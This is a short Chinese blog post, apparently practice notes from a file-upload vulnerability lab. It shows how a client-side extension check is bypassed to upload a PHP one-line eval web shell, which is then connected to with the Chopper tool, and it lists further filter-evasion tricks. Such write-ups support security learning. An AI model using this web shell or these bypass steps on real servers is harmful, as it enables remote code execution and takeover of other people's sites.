溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

文件上傳漏洞練習(xí)筆記(1)

發(fā)布時間:2020-05-24 15:02:20 來源:網(wǎng)絡(luò) 閱讀:2383 作者:Alyoyojie 欄目:安全技術(shù)

(1)打開網(wǎng)站
文件上傳漏洞練習(xí)筆記(1)
(2)我們注意到一個圖片上傳,先傳個jpg看看
文件上傳漏洞練習(xí)筆記(1)
(3)結(jié)果中可以看到Stored in: upload/Tulips.jpg
先記一下,這個是文件的保存路徑,后邊會用到。
下邊開始看看傳其他文件,php,或隨便一個后綴名文件,探究他的過濾能力
我寫了個php文件為1text.php

<?php @eval($_POST['c']);?>  

文件上傳漏洞練習(xí)筆記(1)

(4)我們發(fā)現(xiàn)不能上傳文件,可是又抓包抓不到,可以判定,在本地做了文件過濾
這時候,我們可以看看源代碼,發(fā)現(xiàn)有后綴名的校驗

文件上傳漏洞練習(xí)筆記(1)

(5)我們現(xiàn)在把1test.php改為1test.jpg

文件上傳漏洞練習(xí)筆記(1)

(6)可以發(fā)現(xiàn)文件是可以上傳成功的。
文件上傳漏洞練習(xí)筆記(1)

(7)但顯然,這個也不是我們要的結(jié)果,jpg格式不能直接解析
這個時候,我們想想是不是可以在上傳的時候?qū)⑽募幕豴hp

文件上傳漏洞練習(xí)筆記(1)

(8)居然成功了,,我們菜刀連一下,。。網(wǎng)速太渣,就這樣把

文件上傳漏洞練習(xí)筆記(1)



(9)下邊提升下難度,如果上傳不成功,

 使用大小寫測試,或加 1 2 3 4 5 等,再或者嘗試pht文件
向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI